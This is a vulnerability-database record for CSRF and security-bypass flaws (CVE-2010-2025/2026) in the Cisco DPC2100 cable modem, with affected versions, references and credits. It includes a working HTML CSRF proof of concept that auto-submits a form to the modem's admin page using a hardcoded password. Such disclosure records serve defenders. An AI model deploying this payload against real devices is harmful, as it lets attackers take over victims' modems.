ID

VAR-E-201005-0342


CVE

cve_id:CVE-2010-2025

Trust: 2.4

cve_id:CVE-2010-2026

Trust: 0.8

sources: BID: 40346 // PACKETSTORM: 89916 // EXPLOIT-DB: 34033 // EDBNET: 55415

EDB ID

34033


TITLE

Cisco DPC2100 2.0.2 r1256-060303 - Multiple Security Bypass / Cross-Site Request Forgery Vulnerabilities - Hardware remote Exploit

Trust: 0.6

sources: EXPLOIT-DB: 34033

DESCRIPTION

Cisco DPC2100 2.0.2 r1256-060303 - Multiple Security Bypass / Cross-Site Request Forgery Vulnerabilities. CVE-2010-2025 CVE-64941. Remote exploit for Hardware platform.

Trust: 0.6

sources: EXPLOIT-DB: 34033

AFFECTED PRODUCTS

vendor: cisco // model: dpc2100 r1256-060303 // scope: eq // version: 2.0.2

Trust: 1.6

vendor: scientific // model: atlanta dpc2100 cable modem // scope: - // version: -

Trust: 0.5

vendor: cisco // model: dpc2100r2 r1256-060303 // scope: eq // version: 2.0.2

Trust: 0.3

vendor: cisco // model: dpc2100r2 r1256-100324as // scope: ne // version: 2.0.2

Trust: 0.3

sources: BID: 40346 // PACKETSTORM: 89916 // EXPLOIT-DB: 34033 // EDBNET: 55415

EXPLOIT

source: https://www.securityfocus.com/bid/40346/info

Cisco DPC2100 (formerly Scientific Atlanta DPC2100) is prone to multiple security-bypass and cross-site request-forgery vulnerabilities.

Successful exploits may allow attackers to run privileged commands on the affected device, change configuration settings, modify device firmware, cause denial-of-service conditions, or inject arbitrary script code. Other attacks are also possible.

Firmware versions prior to 2.0.2.r1256-100324as are vulnerable.

<html>
<head>
<title>Test for CSRF vulnerability in WebSTAR modems</title>
</head>
<body>
<form name="csrf" method="post" action="http://192.168.100.1/goform/_aslvl">
<input type="hidden" name="SAAccessLevel" value="0">
<input type="hidden" name="SAPassword" value="W2402">
</form>
<script>document.csrf.submit()</script>
</body>
</html>

Trust: 1.0

sources: EXPLOIT-DB: 34033

EXPLOIT LANGUAGE

html

Trust: 0.6

sources: EXPLOIT-DB: 34033

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 34033

TYPE

Multiple Security Bypass / Cross-Site Request Forgery Vulnerabilities

Trust: 1.0

sources: EXPLOIT-DB: 34033

TAGS

tag:exploit

Trust: 0.5

tag:vulnerability

Trust: 0.5

tag:csrf

Trust: 0.5

sources: PACKETSTORM: 89916

CREDITS

Dan Rosenberg

Trust: 0.6

sources: EXPLOIT-DB: 34033

EXTERNAL IDS

db: NVD // id: CVE-2010-2025

Trust: 2.4

db: EXPLOIT-DB // id: 34033

Trust: 1.9

db: BID // id: 40346

Trust: 1.9

db: NVD // id: CVE-2010-2026

Trust: 0.8

db: EDBNET // id: 55415

Trust: 0.6

db: PACKETSTORM // id: 89916

Trust: 0.5

sources: BID: 40346 // PACKETSTORM: 89916 // EXPLOIT-DB: 34033 // EDBNET: 55415

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2010-2025

Trust: 2.1

url:https://www.securityfocus.com/bid/40346/info

Trust: 1.0

url:https://www.exploit-db.com/exploits/34033/

Trust: 0.6

url:https://nvd.nist.gov/vuln/detail/cve-2010-2026

Trust: 0.5

url:http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0322.html

Trust: 0.3

url:http://www.cisco.com/

Trust: 0.3

url:https://www.exploit-db.com/exploits/34033

Trust: 0.3

sources: BID: 40346 // PACKETSTORM: 89916 // EXPLOIT-DB: 34033 // EDBNET: 55415

SOURCES

db: BID // id: 40346
db: PACKETSTORM // id: 89916
db: EXPLOIT-DB // id: 34033
db: EDBNET // id: 55415

LAST UPDATE DATE

2022-07-27T09:30:46.267000+00:00


SOURCES UPDATE DATE

db: BID // id: 40346 // date: 2010-05-24T19:32:00

SOURCES RELEASE DATE

db: BID // id: 40346 // date: 2010-05-24T00:00:00
db: PACKETSTORM // id: 89916 // date: 2010-05-25T21:34:37
db: EXPLOIT-DB // id: 34033 // date: 2010-05-24T00:00:00
db: EDBNET // id: 55415 // date: 2010-05-24T00:00:00